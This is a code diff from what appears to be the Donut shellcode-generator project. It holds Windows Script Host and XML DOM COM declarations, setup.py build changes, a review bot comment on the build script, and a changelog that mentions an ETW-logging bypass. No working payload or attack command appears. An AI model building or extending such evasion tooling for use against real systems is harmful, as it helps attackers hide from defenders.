241 // Returns the full path of the currently running script.
242 static STDMETHODIMP Host_get_ScriptFullName(IHost *This, BSTR *out_ScriptFullName);
243
244 // Returns the WshArguments object (a collection of arguments).
245 static STDMETHODIMP Host_get_Arguments(IHost *This, void **out_Arguments);
246
247 static STDMETHODIMP Host_get_Version(IHost *This, BSTR *out_Version);
248
249 // Returns the Windows Script Host build version number.
250 static STDMETHODIMP Host_get_BuildVersion(IHost *This, int *out_Build);
251
252 static STDMETHODIMP Host_get_Timeout(IHost *This, LONG *out_Timeout);
253
254 static STDMETHODIMP Host_put_Timeout(IHost *This, LONG v);
255
256 // Connects the object's event sources to functions with a given prefix.
257 static STDMETHODIMP Host_CreateObject(IHost *This, BSTR ProgID, BSTR Prefix, IDispatch **out_Dispatch);
258
259 // Outputs text to either a message box or the command console window.
260 static STDMETHODIMP Host_Echo(IHost *This, SAFEARRAY *args);
261
262 // Retrieves an existing object with the specified ProgID, or creates a new one from a file.
263 static STDMETHODIMP Host_GetObject(IHost *This, BSTR Pathname, BSTR ProgID, BSTR Prefix, IDispatch **out_Dispatch);
264
265 // Disconnects a connected object's event sources.
266 static STDMETHODIMP Host_DisconnectObject(IHost *This, IDispatch *Object);
267
268 // Suspends script execution for a specified length of time, then continues execution.
269 static STDMETHODIMP Host_Sleep(IHost *This, LONG Time);
270
271 // Connects the object's event sources to functions with a given prefix.
272 static STDMETHODIMP Host_ConnectObject(IHost *This, IDispatch *Object, BSTR Prefix);
273
274 // Exposes the read-only input stream for the current script.
275 static STDMETHODIMP Host_get_StdIn(IHost *This, void **ppts);
276
277 // Exposes the write-only output stream for the current script.
278 static STDMETHODIMP Host_get_StdOut(IHost *This, void **ppts);
279
280 // Exposes the write-only error output stream for the current script.
281 static STDMETHODIMP Host_get_StdErr(IHost *This, void **ppts);
282
283 #endif
+0
-588
payload/xmldom.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 /**
32 typedef struct IXMLDOMNodeVtbl {
33 BEGIN_INTERFACE
34
35 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
36 IXMLDOMNode * This,
37 REFIID riid,
38 void **ppvObject);
39
40 ULONG ( STDMETHODCALLTYPE *AddRef )(
41 IXMLDOMNode * This);
42
43 ULONG ( STDMETHODCALLTYPE *Release )(
44 IXMLDOMNode * This);
45
46 HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )(
47 IXMLDOMNode * This,
48 UINT *pctinfo);
49
50 HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )(
51 IXMLDOMNode * This,
52 UINT iTInfo,
53 LCID lcid,
54 ITypeInfo **ppTInfo);
55
56 HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )(
57 IXMLDOMNode * This,
58 REFIID riid,
59 LPOLESTR *rgszNames,
60 UINT cNames,
61 LCID lcid,
62 DISPID *rgDispId);
63
64 HRESULT ( STDMETHODCALLTYPE *Invoke )(
65 IXMLDOMNode * This,
66 DISPID dispIdMember,
67 REFIID riid,
68 LCID lcid,
69 WORD wFlags,
70 DISPPARAMS *pDispParams,
71 VARIANT *pVarResult,
72 EXCEPINFO *pExcepInfo,
73 UINT *puArgErr);
74
75 HRESULT ( STDMETHODCALLTYPE *get_nodeName )(
76 IXMLDOMNode * This,
77 BSTR *name);
78
79 HRESULT ( STDMETHODCALLTYPE *get_nodeValue )(
80 IXMLDOMNode * This,
81 VARIANT *value);
82
83 HRESULT ( STDMETHODCALLTYPE *put_nodeValue )(
84 IXMLDOMNode * This,
85 VARIANT value);
86
87 HRESULT ( STDMETHODCALLTYPE *get_nodeType )(
88 IXMLDOMNode * This,
89 DOMNodeType *type);
90
91 HRESULT ( STDMETHODCALLTYPE *get_parentNode )(
92 IXMLDOMNode * This,
93 IXMLDOMNode **parent);
94
95 HRESULT ( STDMETHODCALLTYPE *get_childNodes )(
96 IXMLDOMNode * This,
97 IXMLDOMNodeList **childList);
98
99 HRESULT ( STDMETHODCALLTYPE *get_firstChild )(
100 IXMLDOMNode * This,
101 IXMLDOMNode **firstChild);
102
103 HRESULT ( STDMETHODCALLTYPE *get_lastChild )(
104 IXMLDOMNode * This,
105 IXMLDOMNode **lastChild);
106
107 HRESULT ( STDMETHODCALLTYPE *get_previousSibling )(
108 IXMLDOMNode * This,
109 IXMLDOMNode **previousSibling);
110
111 HRESULT ( STDMETHODCALLTYPE *get_nextSibling )(
112 IXMLDOMNode * This,
113 IXMLDOMNode **nextSibling);
114
115 HRESULT ( STDMETHODCALLTYPE *get_attributes )(
116 IXMLDOMNode * This,
117 IXMLDOMNamedNodeMap **attributeMap);
118
119 HRESULT ( STDMETHODCALLTYPE *insertBefore )(
120 IXMLDOMNode * This,
121 IXMLDOMNode *newChild,
122 VARIANT refChild,
123 IXMLDOMNode **outNewChild);
124
125 HRESULT ( STDMETHODCALLTYPE *replaceChild )(
126 IXMLDOMNode * This,
127 IXMLDOMNode *newChild,
128 IXMLDOMNode *oldChild,
129 IXMLDOMNode **outOldChild);
130
131 HRESULT ( STDMETHODCALLTYPE *removeChild )(
132 IXMLDOMNode * This,
133 IXMLDOMNode *childNode,
134 IXMLDOMNode **oldChild);
135
136 HRESULT ( STDMETHODCALLTYPE *appendChild )(
137 IXMLDOMNode * This,
138 IXMLDOMNode *newChild,
139 IXMLDOMNode **outNewChild);
140
141 HRESULT ( STDMETHODCALLTYPE *hasChildNodes )(
142 IXMLDOMNode * This,
143 VARIANT_BOOL *hasChild);
144
145 HRESULT ( STDMETHODCALLTYPE *get_ownerDocument )(
146 IXMLDOMNode * This,
147 IXMLDOMDocument **XMLDOMDocument);
148
149 HRESULT ( STDMETHODCALLTYPE *cloneNode )(
150 IXMLDOMNode * This,
151 VARIANT_BOOL deep,
152 IXMLDOMNode **cloneRoot);
153
154 HRESULT ( STDMETHODCALLTYPE *get_nodeTypeString )(
155 IXMLDOMNode * This,
156 BSTR *nodeType);
157
158 HRESULT ( STDMETHODCALLTYPE *get_text )(
159 IXMLDOMNode * This,
160 BSTR *text);
161
162 HRESULT ( STDMETHODCALLTYPE *put_text )(
163 IXMLDOMNode * This,
164 BSTR text);
165
166 HRESULT ( STDMETHODCALLTYPE *get_specified )(
167 IXMLDOMNode * This,
168 VARIANT_BOOL *isSpecified);
169
170 HRESULT ( STDMETHODCALLTYPE *get_definition )(
171 IXMLDOMNode * This,
172 IXMLDOMNode **definitionNode);
173
174 HRESULT ( STDMETHODCALLTYPE *get_nodeTypedValue )(
175 IXMLDOMNode * This,
176 VARIANT *typedValue);
177
178 HRESULT ( STDMETHODCALLTYPE *put_nodeTypedValue )(
179 IXMLDOMNode * This,
180 VARIANT typedValue);
181
182 HRESULT ( STDMETHODCALLTYPE *get_dataType )(
183 IXMLDOMNode * This,
184 VARIANT *dataTypeName);
185
186 HRESULT ( STDMETHODCALLTYPE *put_dataType )(
187 IXMLDOMNode * This,
188 BSTR dataTypeName);
189
190 HRESULT ( STDMETHODCALLTYPE *get_xml )(
191 IXMLDOMNode * This,
192 BSTR *xmlString);
193
194 HRESULT ( STDMETHODCALLTYPE *transformNode )(
195 IXMLDOMNode * This,
196 IXMLDOMNode *stylesheet,
197 BSTR *xmlString);
198
199 HRESULT ( STDMETHODCALLTYPE *selectNodes )(
200 IXMLDOMNode * This,
201 BSTR queryString,
202 IXMLDOMNodeList **resultList);
203
204 HRESULT ( STDMETHODCALLTYPE *selectSingleNode )(
205 IXMLDOMNode * This,
206 BSTR queryString,
207 IXMLDOMNode **resultNode);
208
209 HRESULT ( STDMETHODCALLTYPE *get_parsed )(
210 IXMLDOMNode * This,
211 VARIANT_BOOL *isParsed);
212
213 HRESULT ( STDMETHODCALLTYPE *get_namespaceURI )(
214 IXMLDOMNode * This,
215 BSTR *namespaceURI);
216
217 HRESULT ( STDMETHODCALLTYPE *get_prefix )(
218 IXMLDOMNode * This,
219 BSTR *prefixString);
220
221 HRESULT ( STDMETHODCALLTYPE *get_baseName )(
222 IXMLDOMNode * This,
223 BSTR *nameString);
224
225 HRESULT ( STDMETHODCALLTYPE *transformNodeToObject )(
226 IXMLDOMNode * This,
227 IXMLDOMNode *stylesheet,
228 VARIANT outputObject);
229
230 END_INTERFACE
231 } IXMLDOMNodeVtbl;
232
233 typedef struct _IXMLDOMNode {
234 IXMLDOMNodeVtbl *lpVtbl;
235 } XMLDOMNode;
236
237 typedef struct IXMLDOMDocumentVtbl {
238 BEGIN_INTERFACE
239
240 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
241 IXMLDOMDocument * This,
242 REFIID riid,
243
244 __RPC__deref_out void **ppvObject);
245
246 ULONG ( STDMETHODCALLTYPE *AddRef )(
247 IXMLDOMDocument * This);
248
249 ULONG ( STDMETHODCALLTYPE *Release )(
250 IXMLDOMDocument * This);
251
252 HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )(
253 IXMLDOMDocument * This,
254 UINT *pctinfo);
255
256 HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )(
257 IXMLDOMDocument * This,
258 UINT iTInfo,
259 LCID lcid,
260 ITypeInfo **ppTInfo);
261
262 HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )(
263 IXMLDOMDocument * This,
264 REFIID riid,
265 LPOLESTR *rgszNames,
266 UINT cNames,
267 LCID lcid,
268 DISPID *rgDispId);
269
270 HRESULT ( STDMETHODCALLTYPE *Invoke )(
271 IXMLDOMDocument * This,
272 DISPID dispIdMember,
273 REFIID riid,
274 LCID lcid,
275 WORD wFlags,
276 DISPPARAMS *pDispParams,
277 VARIANT *pVarResult,
278 EXCEPINFO *pExcepInfo,
279 UINT *puArgErr);
280
281 HRESULT ( STDMETHODCALLTYPE *get_nodeName )(
282 IXMLDOMDocument * This,
283 BSTR *name);
284
285 HRESULT ( STDMETHODCALLTYPE *get_nodeValue )(
286 IXMLDOMDocument * This,
287 VARIANT *value);
288
289 HRESULT ( STDMETHODCALLTYPE *put_nodeValue )(
290 IXMLDOMDocument * This,
291 VARIANT value);
292
293 HRESULT ( STDMETHODCALLTYPE *get_nodeType )(
294 IXMLDOMDocument * This,
295 DOMNodeType *type);
296
297 HRESULT ( STDMETHODCALLTYPE *get_parentNode )(
298 IXMLDOMDocument * This,
299 IXMLDOMNode **parent);
300
301 HRESULT ( STDMETHODCALLTYPE *get_childNodes )(
302 IXMLDOMDocument * This,
303 IXMLDOMNodeList **childList);
304
305 HRESULT ( STDMETHODCALLTYPE *get_firstChild )(
306 IXMLDOMDocument * This,
307 IXMLDOMNode **firstChild);
308
309 HRESULT ( STDMETHODCALLTYPE *get_lastChild )(
310 IXMLDOMDocument * This,
311 IXMLDOMNode **lastChild);
312
313 HRESULT ( STDMETHODCALLTYPE *get_previousSibling )(
314 IXMLDOMDocument * This,
315 IXMLDOMNode **previousSibling);
316
317 HRESULT ( STDMETHODCALLTYPE *get_nextSibling )(
318 IXMLDOMDocument * This,
319 IXMLDOMNode **nextSibling);
320
321 HRESULT ( STDMETHODCALLTYPE *get_attributes )(
322 IXMLDOMDocument * This,
323 IXMLDOMNamedNodeMap **attributeMap);
324
325 HRESULT ( STDMETHODCALLTYPE *insertBefore )(
326 IXMLDOMDocument * This,
327 IXMLDOMNode *newChild,
328 VARIANT refChild,
329 IXMLDOMNode **outNewChild);
330
331 HRESULT ( STDMETHODCALLTYPE *replaceChild )(
332 IXMLDOMDocument * This,
333 IXMLDOMNode *newChild,
334 IXMLDOMNode *oldChild,
335 IXMLDOMNode **outOldChild);
336
337 HRESULT ( STDMETHODCALLTYPE *removeChild )(
338 IXMLDOMDocument * This,
339 IXMLDOMNode *childNode,
340 IXMLDOMNode **oldChild);
341
342 HRESULT ( STDMETHODCALLTYPE *appendChild )(
343 IXMLDOMDocument * This,
344 IXMLDOMNode *newChild,
345 IXMLDOMNode **outNewChild);
346
347 HRESULT ( STDMETHODCALLTYPE *hasChildNodes )(
348 IXMLDOMDocument * This,
349 VARIANT_BOOL *hasChild);
350
351 HRESULT ( STDMETHODCALLTYPE *get_ownerDocument )(
352 IXMLDOMDocument * This,
353 IXMLDOMDocument **XMLDOMDocument);
354
355 HRESULT ( STDMETHODCALLTYPE *cloneNode )(
356 IXMLDOMDocument * This,
357 VARIANT_BOOL deep,
358 IXMLDOMNode **cloneRoot);
359
360 HRESULT ( STDMETHODCALLTYPE *get_nodeTypeString )(
361 IXMLDOMDocument * This,
362 BSTR *nodeType);
363
364 HRESULT ( STDMETHODCALLTYPE *get_text )(
365 IXMLDOMDocument * This,
366 BSTR *text);
367
368 HRESULT ( STDMETHODCALLTYPE *put_text )(
369 IXMLDOMDocument * This,
370 BSTR text);
371
372 HRESULT ( STDMETHODCALLTYPE *get_specified )(
373 IXMLDOMDocument * This,
374 VARIANT_BOOL *isSpecified);
375
376 HRESULT ( STDMETHODCALLTYPE *get_definition )(
377 IXMLDOMDocument * This,
378 IXMLDOMNode **definitionNode);
379
380 HRESULT ( STDMETHODCALLTYPE *get_nodeTypedValue )(
381 IXMLDOMDocument * This,
382 VARIANT *typedValue);
383
384 HRESULT ( STDMETHODCALLTYPE *put_nodeTypedValue )(
385 IXMLDOMDocument * This,
386 VARIANT typedValue);
387
388 HRESULT ( STDMETHODCALLTYPE *get_dataType )(
389 IXMLDOMDocument * This,
390 VARIANT *dataTypeName);
391
392 HRESULT ( STDMETHODCALLTYPE *put_dataType )(
393 IXMLDOMDocument * This,
394 BSTR dataTypeName);
395
396 HRESULT ( STDMETHODCALLTYPE *get_xml )(
397 IXMLDOMDocument * This,
398 BSTR *xmlString);
399
400 HRESULT ( STDMETHODCALLTYPE *transformNode )(
401 IXMLDOMDocument * This,
402 IXMLDOMNode *stylesheet,
403 BSTR *xmlString);
404
405 HRESULT ( STDMETHODCALLTYPE *selectNodes )(
406 IXMLDOMDocument * This,
407 BSTR queryString,
408 IXMLDOMNodeList **resultList);
409
410 HRESULT ( STDMETHODCALLTYPE *selectSingleNode )(
411 IXMLDOMDocument * This,
412 BSTR queryString,
413 IXMLDOMNode **resultNode);
414
415 HRESULT ( STDMETHODCALLTYPE *get_parsed )(
416 IXMLDOMDocument * This,
417 VARIANT_BOOL *isParsed);
418
419 HRESULT ( STDMETHODCALLTYPE *get_namespaceURI )(
420 IXMLDOMDocument * This,
421 BSTR *namespaceURI);
422
423 HRESULT ( STDMETHODCALLTYPE *get_prefix )(
424 IXMLDOMDocument * This,
425 BSTR *prefixString);
426
427 HRESULT ( STDMETHODCALLTYPE *get_baseName )(
428 IXMLDOMDocument * This,
429 BSTR *nameString);
430
431 HRESULT ( STDMETHODCALLTYPE *transformNodeToObject )(
432 IXMLDOMDocument * This,
433 IXMLDOMNode *stylesheet,
434 VARIANT outputObject);
435
436 HRESULT ( STDMETHODCALLTYPE *get_doctype )(
437 IXMLDOMDocument * This,
438 IXMLDOMDocumentType **documentType);
439
440 HRESULT ( STDMETHODCALLTYPE *get_implementation )(
441 IXMLDOMDocument * This,
442 IXMLDOMImplementation **impl);
443
444 HRESULT ( STDMETHODCALLTYPE *get_documentElement )(
445 IXMLDOMDocument * This,
446 IXMLDOMElement **DOMElement);
447
448 HRESULT ( STDMETHODCALLTYPE *putref_documentElement )(
449 IXMLDOMDocument * This,
450 IXMLDOMElement *DOMElement);
451
452 HRESULT ( STDMETHODCALLTYPE *createElement )(
453 IXMLDOMDocument * This,
454 BSTR tagName,
455 IXMLDOMElement **element);
456
457 HRESULT ( STDMETHODCALLTYPE *createDocumentFragment )(
458 IXMLDOMDocument * This,
459 IXMLDOMDocumentFragment **docFrag);
460
461 HRESULT ( STDMETHODCALLTYPE *createTextNode )(
462 IXMLDOMDocument * This,
463 BSTR data,
464 IXMLDOMText **text);
465
466 HRESULT ( STDMETHODCALLTYPE *createComment )(
467 IXMLDOMDocument * This,
468 BSTR data,
469 IXMLDOMComment **comment);
470
471 HRESULT ( STDMETHODCALLTYPE *createCDATASection )(
472 IXMLDOMDocument * This,
473 BSTR data,
474 IXMLDOMCDATASection **cdata);
475
476 HRESULT ( STDMETHODCALLTYPE *createProcessingInstruction )(
477 IXMLDOMDocument * This,
478 BSTR target,
479 BSTR data,
480 IXMLDOMProcessingInstruction **pi);
481
482 HRESULT ( STDMETHODCALLTYPE *createAttribute )(
483 IXMLDOMDocument * This,
484 BSTR name,
485 IXMLDOMAttribute **attribute);
486
487 HRESULT ( STDMETHODCALLTYPE *createEntityReference )(
488 IXMLDOMDocument * This,
489 BSTR name,
490 IXMLDOMEntityReference **entityRef);
491
492 HRESULT ( STDMETHODCALLTYPE *getElementsByTagName )(
493 IXMLDOMDocument * This,
494 BSTR tagName,
495 IXMLDOMNodeList **resultList);
496
497 HRESULT ( STDMETHODCALLTYPE *createNode )(
498 IXMLDOMDocument * This,
499 VARIANT Type,
500 BSTR name,
501 BSTR namespaceURI,
502 IXMLDOMNode **node);
503
504 HRESULT ( STDMETHODCALLTYPE *nodeFromID )(
505 IXMLDOMDocument * This,
506 BSTR idString,
507 IXMLDOMNode **node);
508
509 HRESULT ( STDMETHODCALLTYPE *load )(
510 IXMLDOMDocument * This,
511 VARIANT xmlSource,
512 VARIANT_BOOL *isSuccessful);
513
514 HRESULT ( STDMETHODCALLTYPE *get_readyState )(
515 IXMLDOMDocument * This,
516 long *value);
517
518 HRESULT ( STDMETHODCALLTYPE *get_parseError )(
519 IXMLDOMDocument * This,
520 IXMLDOMParseError **errorObj);
521
522 HRESULT ( STDMETHODCALLTYPE *get_url )(
523 IXMLDOMDocument * This,
524 BSTR *urlString);
525
526 HRESULT ( STDMETHODCALLTYPE *get_async )(
527 IXMLDOMDocument * This,
528 VARIANT_BOOL *isAsync);
529
530 HRESULT ( STDMETHODCALLTYPE *put_async )(
531 IXMLDOMDocument * This,
532 VARIANT_BOOL isAsync);
533
534 HRESULT ( STDMETHODCALLTYPE *abort )(
535 IXMLDOMDocument * This);
536
537 HRESULT ( STDMETHODCALLTYPE *loadXML )(
538 IXMLDOMDocument * This,
539 BSTR bstrXML,
540 VARIANT_BOOL *isSuccessful);
541
542 HRESULT ( STDMETHODCALLTYPE *save )(
543 IXMLDOMDocument * This,
544 VARIANT destination);
545
546 HRESULT ( STDMETHODCALLTYPE *get_validateOnParse )(
547 IXMLDOMDocument * This,
548 VARIANT_BOOL *isValidating);
549
550 HRESULT ( STDMETHODCALLTYPE *put_validateOnParse )(
551 IXMLDOMDocument * This,
552 VARIANT_BOOL isValidating);
553
554 HRESULT ( STDMETHODCALLTYPE *get_resolveExternals )(
555 IXMLDOMDocument * This,
556 VARIANT_BOOL *isResolving);
557
558 HRESULT ( STDMETHODCALLTYPE *put_resolveExternals )(
559 IXMLDOMDocument * This,
560 VARIANT_BOOL isResolving);
561
562 HRESULT ( STDMETHODCALLTYPE *get_preserveWhiteSpace )(
563 IXMLDOMDocument * This,
564 VARIANT_BOOL *isPreserving);
565
566 HRESULT ( STDMETHODCALLTYPE *put_preserveWhiteSpace )(
567 IXMLDOMDocument * This,
568 VARIANT_BOOL isPreserving);
569
570 HRESULT ( STDMETHODCALLTYPE *put_onreadystatechange )(
571 IXMLDOMDocument * This,
572 VARIANT readystatechangeSink);
573
574 HRESULT ( STDMETHODCALLTYPE *put_ondataavailable )(
575 IXMLDOMDocument * This,
576 VARIANT ondataavailableSink);
577
578 HRESULT ( STDMETHODCALLTYPE *put_ontransformnode )(
579 IXMLDOMDocument * This,
580 VARIANT ontransformnodeSink);
581
582 END_INTERFACE
583 } IXMLDOMDocumentVtbl;
584
585 typedef struct _IXMLDOMDocument {
586 IXMLDOMDocumentVtbl *lpVtbl;
587 } XMLDomDocument;*/
+0
-4
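--- a/setup.cfg
+++ b/setup.cfg
@@ -1,4 +0,0 @@
-[egg_info]
-tag_build =
-tag_date = 0
-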
00 from setuptools import Extension, setup
1 import sys
12
23 with open("README.md", "r") as fh:
34 long_description = fh.read()
45
6 static_libraries = ['aplib64']
7 static_lib_dir = 'lib'
8 libraries = []
9 library_dirs = ['lib']
10 extra_compile_args = []
11 extra_link_args = []
12 extra_objects = []
13 include_dirs = ['include']
14 sources = ['donut.c',
15 'hash.c',
16 'encrypt.c',
17 'format.c',
18 'loader/clib.c',
19 'donutmodule.c']
20
21 if sys.platform == 'win32':
22 libraries.extend(static_libraries)
23 library_dirs.append(static_lib_dir)
24 extra_objects = []
25 elif sys.platform == 'win64':
26 libraries.extend(static_libraries)
27 library_dirs.append(static_lib_dir)
28 extra_objects = []
29 else: # POSIX
30 extra_objects = ['{}/{}.a'.format(static_lib_dir, l) for l in static_libraries]
31
32
533 module = Extension(
634 "donut",
7 include_dirs=[
8 'include'
9 ],
10 sources=[
11 'donut.c',
12 'hash.c',
13 'encrypt.c',
14 'payload/clib.c',
15 'donutmodule.c'
16 ]
35 include_dirs = include_dirs,
36 sources = sources,
37 libraries = libraries,
38 library_dirs = library_dirs,
39 extra_compile_args = extra_compile_args,
40 extra_link_args = extra_link_args,
41 extra_objects = extra_objects,
1742 )
1843
1944 setup(
2045 name='donut-shellcode',
21 version='0.9.2',
46 version='0.9.3',
2247 description='Donut Python C extension',
2348 long_description=long_description,
2449 long_description_content_type="text/markdown",
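Review bot: The `elif sys.platform == 'win64':` branch is dead code: `sys.platform` reports `'win32'` on both 32-bit and 64-bit Windows interpreters, so the first branch always handles Windows and the second can be deleted. It also means `aplib64` is linked whatever the interpreter's bitness; judging by the name it is a 64-bit library, so a 32-bit build would presumably fail at link time, and a guard such as `if sys.maxsize <= 2**32: raise RuntimeError("64-bit Python required")` would make that failure explicit. On the POSIX path `extra_objects` pulls `lib/aplib64.a` straight into the extension; if that archive is shipped prebuilt rather than compiled from source in this tree (not visible here), its origin and checksum should be recorded so the packaged binary can be verified. `library_dirs.append(static_lib_dir)` adds a second `'lib'` to a list that already starts as `['lib']`.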
1313 * v1.1:
1414 * Automatic unloading of Application Domains after the Assembly finishes executing.
1515 * Support for HTTP proxies
16 * v2.0:
17 * Added moduler bypass system for ETW
18 * Added option for preserving PE headers of native payloads